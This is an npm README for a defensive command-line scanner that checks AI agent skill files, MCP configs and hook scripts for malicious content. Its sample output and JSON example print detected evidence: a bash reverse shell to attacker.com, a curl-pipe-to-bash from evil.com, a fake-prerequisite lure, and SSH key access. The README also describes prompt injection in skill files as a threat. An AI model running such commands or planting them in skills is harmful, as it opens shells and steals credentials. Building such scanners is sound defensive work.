lokinskills
v1.0.0
Published
LokinSkills — Security scanner for AI agent skill files. Detects reverse shells, prompt injection, supply chain attacks, MCP config risks and more. 78+ heuristic rules, no account required.
Maintainers
Readme
lokinskills
Security scanner for AI agent skill files. Detects reverse shells, prompt injection, supply chain attacks, MCP config risks, and more — 78+ heuristic rules, no account required, runs locally.
npx lokinskills ./SKILL.mdWhat it does
AI agent frameworks (Claude, Cursor, Copilot, MCP) load external skill files that extend what an AI can do. These files can contain malicious instructions — reverse shells, credential exfiltration, prompt injection — hidden inside what looks like a normal skill.
lokinskills analyses any skill file and gives you a verdict before you install it. It also supports .mcp.json configuration files and hook scripts.
LokinSkills Security Scanner v1.0.0
────────────────────────────────────────────────────
Target: ./SKILL.md
Size: 4,821 chars
Checks: 78+ heuristic rules
────────────────────────────────────────────────────
DANGEROUS Risk Score: 85/100
⚠ LETHAL TRIFECTA DETECTED
Private data + External comms + Shell access — all present
Findings (4):
🔴 CRITICAL [ast01.1] Reverse Shell — Bash
↳ bash -i >& /dev/tcp/attacker.com/4444
🔴 CRITICAL [ast01.3] Curl/Wget Pipe to Shell
↳ curl https://evil.com/install.sh | bash
🔴 CRITICAL [ast02.1] ClickFix — Fake Prerequisites
↳ To enable full functionality, please run:
🟠 HIGH [ast03.1] SSH / AWS Credential Access
↳ ~/.ssh/id_rsa
────────────────────────────────────────────────────
View full report & Deep AI scan: https://lokinskills.site/scannerInstallation
No installation needed. Use npx to run directly:
npx lokinskills ./SKILL.mdOr install globally:
npm install -g lokinskills
lokinskills ./SKILL.mdRequires Node.js ≥ 18.
Usage
# Scan a skill file
npx lokinskills ./SKILL.md
# Scan an AGENTS.md file
npx lokinskills ./AGENTS.md
# Scan an MCP configuration file
npx lokinskills ./.mcp.json
# Scan a hook script (severity is automatically elevated)
npx lokinskills ./hooks/pre-tool.sh
# Scan from a GitHub URL
npx lokinskills https://raw.githubusercontent.com/owner/repo/main/SKILL.md
# Fail CI if score reaches WARNING (≥25) or higher
npx lokinskills ./SKILL.md --fail-on=warning
# Fail CI only on DANGEROUS (≥60) — default
npx lokinskills ./SKILL.md --fail-on=dangerous
# JSON output for scripting
npx lokinskills ./SKILL.md --json
# Disable ANSI colours
npx lokinskills ./SKILL.md --no-colorFlags
| Flag | Description |
|---|---|
| --json | Output results as JSON (verdict, score, findings array) |
| --fail-on=<level> | Exit code 1 when: warning (score ≥25) or dangerous (score ≥60) |
| --no-color | Disable ANSI colours — useful for log files |
| --version | Print version |
Supported file types
| File | Notes |
|---|---|
| SKILL.md, AGENTS.md | Standard skill/agent instruction files |
| *.mcp.json | MCP server configuration — checks for credential exposure, wildcard permissions, typosquatting |
| hooks/*.sh, hooks/*.py, hooks/*.js | Hook scripts — findings are severity-elevated (MEDIUM→HIGH, HIGH→CRITICAL) |
| package.json | Lifecycle hook scripts (preinstall, postinstall, prepare, etc.) are extracted and scanned |
JSON output format
{
"target": "./SKILL.md",
"verdict": "DANGEROUS",
"riskScore": 85,
"lethalTrifecta": true,
"findings": [
{
"id": "ast01.1",
"name": "Reverse Shell — Bash",
"severity": "CRITICAL",
"weight": 35,
"evidence": "bash -i >& /dev/tcp/attacker.com/4444"
}
]
}GitHub Action
# .github/workflows/skills-scan.yml
name: Security Scan
on:
push:
paths: [SKILL.md, AGENTS.md, .mcp.json]
pull_request:
paths: [SKILL.md, AGENTS.md, .mcp.json]
jobs:
lokinskills:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Scan skill file
run: npx --yes lokinskills ./SKILL.md --fail-on=dangerousThreat categories
| ID | Category | Severity | |---|---|---| | AST01 | Malicious Skill Payload | CRITICAL | | AST02 | Supply Chain Compromise | CRITICAL | | AST03 | Over-Privileged Skill | HIGH | | AST04 | Prompt Injection / Instruction Override | CRITICAL | | AST05 | Unsafe Deserialization | HIGH | | AST06 | Insecure Metadata | MEDIUM | | AST07 | Update Drift / Weak Provenance | MEDIUM | | EVASION | Evasion Techniques | HIGH | | CLAWHAVOC | ClawHavoc Campaign Indicators | CRITICAL | | MCP | MCP Configuration Risk | HIGH |
MCP-specific rules
| Rule | What it catches | Severity |
|---|---|---|
| mcp.1 | alwaysAllow wildcard ("*") | HIGH |
| mcp.2 | Hardcoded credentials in env or headers | HIGH |
| mcp.3 | Typosquatting of @modelcontextprotocol packages | HIGH |
Hook script elevation
When scanning a file detected as a hook script (path contains hooks/ or .claude/hooks/, or stem is a known hook name), all findings are automatically elevated:
- MEDIUM → HIGH
- HIGH → CRITICAL
Lethal Trifecta
When a skill has all three simultaneously:
- Access to private data (filesystem, credentials, SSH keys)
- External network communication
- Shell execution capability
Together they form a complete data exfiltration chain. The risk score gets a +30 bonus when all three are present.
Verdicts
| Verdict | Score | Meaning | |---|---|---| | SAFE | 0–24 | No significant threats detected | | WARNING | 25–59 | Suspicious patterns — review before using | | DANGEROUS | 60–100 | Active threats detected — do not install |
Limitations
This CLI runs heuristic rules only — no AI. It is fast and free, but AI-assisted context analysis (which reduces false positives significantly) is available via the LokinSkills web platform.
A curl command in a deployment skill is different from one in a notes-taking skill. Heuristics can't always tell the difference. The AI deep scan can.
About
Built by Mateus Massiala — a self-taught developer from Angola who asked: "What if the AI skills everyone is installing are actually attack vectors?"
The answer was yes. So he built this.
Web platform: lokinskills.site
Full registry: lokinskills.site/registry
License
MIT
